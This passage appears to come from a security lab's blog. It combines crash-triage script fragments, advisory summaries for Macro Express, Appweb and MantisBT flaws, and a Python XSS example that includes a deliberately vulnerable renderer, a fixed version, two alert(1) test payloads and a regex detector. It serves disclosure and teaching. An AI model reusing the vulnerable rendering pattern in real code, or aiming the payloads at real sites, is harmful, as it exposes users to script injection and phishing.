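def bucket(record):
    """Dedup key for a fuzzing run: the tool's Major/Minor hash pair, the
    Major hash being the coarser of the two."""
    return (record["MAJOR_HASH"], record["MINOR_HASH"])


if __name__ == "__main__":
    rec = parse_exploitable(SAMPLE)
    ins = tainted_control_transfer(rec)
    print(rec["CLASSIFICATION"], rec["SHORT_DESCRIPTION"], bucket(rec))
    print(f"control transfer on tainted data at {ins['addr']:08x}: {ins['mnemonic']} {ins['operands']}")
```

Feeding this the other verdicts the tool produces (EXPLOITABLE, PROBABLY_NOT_EXPLOITABLE, UNKNOWN) works the same way; `tainted_control_transfer` returning None for a write-AV crash is the cue to look at the tainted operands of the faulting store instead.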

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4999.php

Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC

A buffer overflow vulnerability has been identified in Macro Express Pro; the same issue may exist in the regular version and in older versions of Macro Express and Macro Express Pro. We reported the issue to the vendor through their bug reporting system (http://www.macros.com/bugreport.htm) and received no response, confirmation or cooperation.

While debugging the application we managed to overwrite several registers and, from there, execute arbitrary code on the affected system.

You can take a look at the advisory here: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4986.php

Embedthis Appweb Web Server 3.2.2-1 (Ejscript) Remote XSS Vulnerability

Appweb Web Server suffers from a remote reflected cross-site scripting vulnerability: input passed to the Ejscript web framework is not properly sanitized, allowing an attacker to execute arbitrary HTML and script code in a user’s browser session and to aid phishing attacks.

Vendor releases version 3.2.3 to address this issue. Thanks to Michael for his cooperation ;)

Advisory ID: ZSL-2010-4985
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4985.php

Vendor: http://appwebserver.org/forum/viewtopic.php?f=1&t=1894

Mantis Bug Tracker security advisories and patches

Today Zero Science Lab, in cooperation with the MantisBT Group, published security advisories and patches for the popular open-source bug tracking system MantisBT. They cover several serious vulnerabilities through which an attacker can reach sensitive information on the affected system by directory traversal, or execute HTML code in the user’s browser via an XSS attack.

The weakness lies in the “upgrade_unattended.php” script, located in the “admin” directory. When the “db_type” parameter is supplied via either GET or POST, the application does not sanitize the user input sufficiently or in a controlled way, and system information is disclosed.

By definition these are Reflected (Non-persistent) Cross-Site Scripting, Local File Inclusion/Disclosure and Path Disclosure vulnerabilities. We tested against “live” websites (with permission) and decided to rate the vulnerabilities as Medium Risk (XSS) and High Risk (LFI).

Many thanks to David Hicks and Victor Boctor of the MantisBT group, who responded to the reported weaknesses and reacted in the shortest possible time, both in releasing a patch and advisories and in the subsequent release of version 1.2.4. Although David pointed out that there was a “Warning” that the “admin” folder should be deleted after installation, I did not see such a warning, because of the differing operating systems and PHP permissions, and we concluded that many MantisBT installations on the Internet still have the “admin” folder present.

Besides the publicly released advisories, we also published an official Google Dork in the Exploit-DB community: http://www.exploit-db.com/ghdb/3651/

The advisories from ZSL and from MantisBT can be found below:

ZSL-2010-4983: MantisBT <=1.2.3 (db_type) Cross-Site Scripting & Path Disclosure Vulnerability
ZSL-2010-4983: MantisBT <=1.2.3 (db_type) Local File Inclusion Vulnerability
MantisBT: http://www.mantisbt.org/bugs/view.php?id=12607
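All of the XSS findings on this page (Anfibia Reactor’s ‘email’ in login.do, DoceboLMS’s ‘name’/‘code’/‘title’, FCMS’s ‘subject’, Appweb’s Ejscript input and MantisBT’s ‘db_type’) come down to the same defect: user input is written into an HTML response without output encoding. The following is an added example, not code from any of the affected products: a minimal login-page renderer in its vulnerable and in its hardened form, plus the check a scanner uses to tell the two apart. The HTML, the payloads and the sample address are constructed for the example; only the ‘email’ parameter name is taken from the Anfibia advisory.

```python
import html
import re

# Constructed payloads: one for a text-node context, one that breaks out of a
# value="" attribute without needing a '<' at all.
PAYLOAD_TEXT = "<script>alert(1)</script>"
PAYLOAD_ATTR = '" onfocus="alert(1)" autofocus="'


def render_login_vulnerable(email):
    """Reflects the POSTed 'email' straight back into the form, the behaviour
    the advisory describes for login.do (the markup itself is made up here)."""
    return f'<form method="post"><input name="email" value="{email}"><p>{email}</p></form>'


def render_login_fixed(email):
    """Same page with output encoding at the point of writing into HTML:
    html.escape(quote=True) turns < > & " ' into entities, so the value can
    neither close the attribute nor open a tag. Encoding on output (not on
    input) is what also fixes the *stored* variants, where the payload was
    written to the database long before the page is rendered."""
    safe = html.escape(email, quote=True)
    return f'<form method="post"><input name="email" value="{safe}"><p>{safe}</p></form>'


# a raw <script or an unescaped quote followed by an on* event handler
MARKUP_OR_BREAKOUT = re.compile(r'<script|"\s*on\w+\s*=', re.IGNORECASE)


def reflects_unescaped(page, payload):
    """Scanner-style verdict: the payload came back byte-for-byte AND it forms
    live markup in the response. Checking both avoids false positives on pages
    that echo the input inside an entity-encoded attribute."""
    return payload in page and MARKUP_OR_BREAKOUT.search(page) is not None


if __name__ == "__main__":
    for name, render in (("vulnerable", render_login_vulnerable), ("fixed", render_login_fixed)):
        for payload in (PAYLOAD_TEXT, PAYLOAD_ATTR):
            print(f"{name:10} {reflects_unescaped(render(payload), payload)!s:5} {render(payload)}")
```

The attribute payload is the one worth keeping in a test set: a filter that only strips `<script>` still leaves the vulnerable renderer exploitable, while the entity-encoding fix handles both contexts with the same call.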

Update. ;}